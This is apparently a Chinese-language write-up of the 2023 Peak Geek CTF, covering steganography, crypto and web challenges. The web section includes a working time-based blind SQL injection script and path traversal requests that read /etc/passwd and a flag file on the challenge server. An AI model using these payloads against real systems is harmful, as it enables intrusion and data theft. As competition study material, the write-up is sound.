巅峰极客 2023 Writeup

6 min read

Misc

welcome

极客荟萃,逐梦巅峰!欢迎大家参加中国电信·2023“巅峰极客”网络安全技能挑战赛。 本场比赛空调已开放.jpg,请各位选手提交flag凭证有序进入。 flag凭证如下: ZmxhZ3tQZWVrZ2Vla18xc19BX0dyM2E3X2VWZW43X2Ywcl9ldjNyeV9DVEZlcn0=

直接 Base64 解码

flag{Peekgeek_1s_A_Gr3a7_eVen7_f0r_ev3ry_CTFer}

foundme

I made an image that I really liked with my favorite flag, but the computer accidentally shut down, but fortunately I saved the dump file.

直接 010 打开检索 flag 得到一段提示

It's just a dump file, and you've found a new lead Maybe you know the Netflix picture format? Hope this hint helps you. Search for more information to find the flag!

同时发现一个文件 FFFFFFLAG.AVIF

image-20230721174012663

直接百度找了一个图片在线转 AVIF 的网站,然后查看文件头为一下内容(第四位不固定,所以我们直接搜后四位)

00 00 00 xx 66 74 79 70

image-20230721174439483

找到了文件头但是找不到文件尾,直接不管那么多,随缘复制然后导出为 avif 即可,照片查看器有容错机制

image-20230721174540922

song

网易云,上号!

直接 010 搜索附件找到 flag.txt文件,但是 binwalk 分离不出压缩包

image-20230721174807634

后来直接开头前五位改写为 50 4b 03 04 14 同时后缀改为 zip 正常打开了,解压后全局搜索 flag 发现 docProps\app.xml 里面提示 Flag in Netease cloud

image-20230721205223638

同时在 docProps\thumbnail.jpe 分离出一个压缩包

image-20230721205717439

Please do not try to burst the password!!!!!!!!

同时在 password_hint.txt 得到一串编码

9iZ!r@n(9KAQV])<,6_K:,$L-<`N0U>'`J\@;A:f@X:pc;__<N;f->);/8c[<(K>S=u&Q<<C\oJA2-DK9l+cpAQMnd;/LD5=&s-8@T?rP;cdd':,$@!;_g1U<ARX#;)<$*;/J0E@P^bo;f-JGAQ3=t:/tFO@r$$s9gs:q@kgl'<`Lh:

直接 CyberChef 梭掉,另外最后需要选择一下编码为 UFT-8 否则乱码

image-20230721210329379

然后在 ppt/media 目录发现一个大小异常的图片 image4.png

image-20230721205039320

其中 image4.pngimage5.png 图片除文件大小为,其他一模一样(内容和宽高),通过 010 观察两个文件发现 image4.png 是在 image5.png 的基础上插入了大量的内容,通过比对文件尾发现插入其他内容的 hex 如下所示

C7FF038FBFE300A4F7141C<插入的内容>0000000049454E44AE426082

直接编写代码取出插入的部分,然后转换为文件

import binascii

with open('image4.png', 'rb') as f:
    hex_data = binascii.hexlify(f.read()).decode().upper()

start_idx = hex_data.find('C7FF038FBFE300A4F7141C')
end_idx = hex_data.find('0000000049454E44AE426082')

data = binascii.unhexlify(hex_data[start_idx + 22:end_idx])

with open('output', 'wb') as f:
    f.write(data)

直接通过 file 命令分析一波

┌──(kali㉿kali)-[~/Desktop]
└─$ file output
output: Monkey's Audio compressed format version 3990 with high compression, stereo, sample rate 44100

百度检索 Monkey's Audio 发现文件后缀格式应该为 .ape 且是一个音频文件,我们直接后缀改为 .ape

Monkey's Audio是一种无损压缩技术的软件,常被用来解压缩APE格式的无损音乐文件,APE是流行的数字音乐文件格式之一。

直接使用 Deepsound 进行解密(这隐写软件只在 VishwaCTF 2023 里面用过,幸好隔得时间不长没忘记),直接导入文件,提示输入密码

结合 password_hint.txt 得到的信息直接弱密码 123456 解密成功

image-20230722140919082

得到的 password.txt 文件内容为 Ook 编码,直接解码后得到密码

this_zip_password_is_QazWsx147!@#

最终解压我们最初分离出的文件得到 flag

flag{lW9tUyrh8RzzvysrswAwY7MHR4mmbLSt}

Web

hellosql

笛卡尔积,导致时间盲注

import requests
import time

url = "http://web-2f7d23ba90.challenge.xctf.org.cn/index.php?id="
flag = ""

def str2hex(str):
    hex1='0x'
    for i in str:
        hex1+=hex(ord(i))[2:]
    return hex1
result=''
for i in range(1,100) :
    time.sleep(0.1)
    low = 32
    high = 127
    mid = (low + high) // 2

    while (low < high):

        payload = "' OR CASE WHEN ASCII(SUBSTR((SELECT(group_concat(Flagg))from(ctf.Flllag)),{},1))>{} THEN (SELECT MAX(A.TABLE_NAME) FROM information_schema.columns A, information_schema.columns B) END#".format(i, mid)

        start_time = time.time()
        r = requests.get(url=url,params={
            "id":payload
        },)
        end_time = time.time()
        print(end_time-start_time)
        if (end_time - start_time) >= 0.5:
            low = mid + 1

        else:
            high = mid
        mid = (low + high) // 2

    if mid == 32 or mid == 127:
        break
    print(i)
    flag += chr(mid)
    print(flag)

hinder

路由为/hinder

我们尝试双写 // 得到一个 hint

image-20230721175342902

经过测试发现存在任意文件下载,但是经过 FUZZ 以及读取环境变量等操作,并未发现 flag

//hinder/download.action?filename=../../../../../../../../../../../../etc/passwd

最终通过读取未删除的 /run.sh 文件得到 flag 存在于 oh_u_f1nd_me 文件中

#!/bin/sh

#echo $FLAG > /oh_u_f1nd_me
FLAG=not_here
export FLAG=not_here
/usr/local/tomcat/bin/catalina.sh run
//hinder/download.action?filename=../../../../../../../../../../../../oh_u_f1nd_me

Crypto

数学但高中

来感受一下画图的乐趣,没有字母’o’

desmos 中输入附件给出的函数即可

flag{Funct10n_Fun}

image-20230722142542057

Simple_encryption

一起学数学

第一段:原题 [V&N2020 公开赛]Fast

第二段:一元copper

import gmpy2
import binascii
from sympy import Symbol, solve
from Crypto.Util.number import long_to_bytes

c1= 19024563955839349902897822692180949371550067644378624199902067434708278125346234824900117853598997270022872667319428613147809325929092749312310446754419305096891122211944442338664613779595641268298482084259741784281927857614814220279055840825157115551456554287395502655358453270843601870807174309121367449335110327991187235786798374254470758957844690258594070043388827157981964323699747450405814713722613265012947852856714100237325256114904705539465145676960232769502207049858752573601516773952294218843901330100257234517481221811887136295727396712894842769582824157206825592614684804626241036297918244781918275524254
c2= 11387447548457075057390997630590504043679006922775566653728699416828036980076318372839900947303061300878930517069527835771992393657157069014534366482903388936689298175411163666849237525549902527846826224853407226289495201341719277080550962118551001246017511651688883675152554449310329664415179464488725227120033786305900106544217117526923607211746947511746335071162308591288281572603417532523345271340113176743703809868369623401559713179927002634217140206608963086656140258643119596968929437114459557916757824682496866029297120246221557017875892921591955181714167913310050483382235498906247018171409256534124073270350
N= 21831630625212912450058787218272832615084640356500740162478776482071876178684642739065105728423872548532056206845637492058465613779973193354996353323494373418215019445325632104575415991984764454753263189235376127871742444636236132111097548997063091478794422370043984009615893441148901566420508196170556189546911391716595983110030778046242014896752388438535131806524968952947016059907135882390507706966746973544598457963945671064540465259211834751973065197550500334726779434679470160463944292619173904064826217284899341554269864669620477774678605962276256707036721407638013951236957603286867871199275024050690034901963
g1= 20303501619435729000675510820217420636246553663472832286487504757515586157679361170332171306491820918722752848685645096611030558245362578422584797889428493611704976472409942840368080016946977234874471779189922713887914075985648876516896823599078349725871578446532134614410886658001724864915073768678394238725788245439086601955497248593286832679485832319756671985505398841701463782272300202981842733576006152153012355980197830911700112001441621619417349747262257225469106511527467526286661082010163334100555372381681421874165851063816598907314117035131618062582953512203870615406642787786668571083042463072230605649134
g2=14068322834597276347776814624877614869834816383564391664570268934537693322688875343215293618493363798985047779057952636529313879548457643220996398640913517182122425631198219387988691569709691279442005545716133131472147592456812502863851227108284027033557263611949365667779259585770738623603814004666845554284808166195201470503432803440754207350347128045893594280079379926676477680556845095378093693409219131090910168117334308781843178748431526974047817218228075136005979538773141427004682344298827618677773735288946271346252828348742296301538573408254015281232250841148556304927266143397565889649305095857756884049430

def decrypt(c1, c2):
    xp = c1 % p
    xq = c2 % q
    m = (xp*gmpy2.invert(q, p)*q + xq*gmpy2.invert(p, q)*p) % N
    return m

p = gmpy2.gcd(g1-1,N)
q = gmpy2.gcd(g2-1,N)
m = decrypt(c1,c2)
flag1 = binascii.unhexlify(hex(m)[2:]).decode('utf-8')

S= 234626762558445335519229319778735528295
N= 28053749721930780797243137464055357921262616541619976645795810707701031602793034889886420385567169222962145128498131170577184276590698976531070900776293344109534005057067680663813430093397821366071365221453788763262381958185404224319153945950416725302184077952893435265051402645871699132910860011753502307815457636525137171681463817731190311682277171396235160056504317959832747279317829283601814707551094074778796108136141845755357784361312469124392408642823375413433759572121658646203123677327551421440655322226192031542368496829102050186550793124020718643243789525477209493783347317576783265671566724068427349961101
e= 5
Cs= [1693447496400753735762426750097282582203894511485112615865753001679557182840033040705025720548835476996498244081423052953952745813186793687790496086492136043098444304128963237489862776988389256298142843070384268907160020751319313970887199939345096232529143204442168808703063568295924663998456534264361495136412078324133263733409362366768460625508816378362979251599475109499727808021609000751360638976, 2240772849203381534975484679127982642973364801722576637731411892969654368457130801503103210570803728830063876118483596474389109772469014349453490395147031665061733965097301661933389406031214242680246638201663845183194937353509302694926811282026475913703306789097162693368337210584494881249909346643289510493724709324540062077619696056842225526183938442535866325407085768724148771697260859350213678910949, 5082341111246153817896279104775187112534431783418388292800705085458704665057344175657566751627976149342406406594179073777431676597641200321859622633948317181914562670909686170531929552301852027606377778515019377168677204310642500744387041601260593120417053741977533047412729373182842984761689443959266049421034949822673159561609487404082536872314636928727833394518122974630386280495027169465342976]

flag2 = ''
for i in range(2):
    m1 = gmpy2.iroot(Cs[i], e)[0]
    s = Symbol('s')
    eq = (i + 128) ** 2 * s ** 2 + (i + 1024) * s + (i + 512) - m1
    result = list(solve(eq, s))
    flag2 += long_to_bytes(result[1]).decode('utf-8')

print(flag1 + flag2)
# flag{f561fafb-32ce-9d16-18fa-ec795fc1d208}